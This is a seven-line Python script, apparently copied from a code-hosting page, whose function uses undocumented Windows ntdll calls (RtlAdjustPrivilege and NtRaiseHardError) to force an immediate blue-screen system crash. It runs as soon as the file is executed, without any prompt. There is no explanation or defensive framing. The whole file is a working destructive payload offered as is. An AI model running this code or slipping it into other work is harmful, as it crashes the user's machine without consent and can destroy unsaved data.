7 lines
229 B
Python
7 lines
229 B
Python
|
|
import ctypes
|
||
|
|
|
||
|
|
def blue_screen():
|
||
|
|
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
|
||
|
|
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.c_ulong()))
|
||
|
|
blue_screen()
|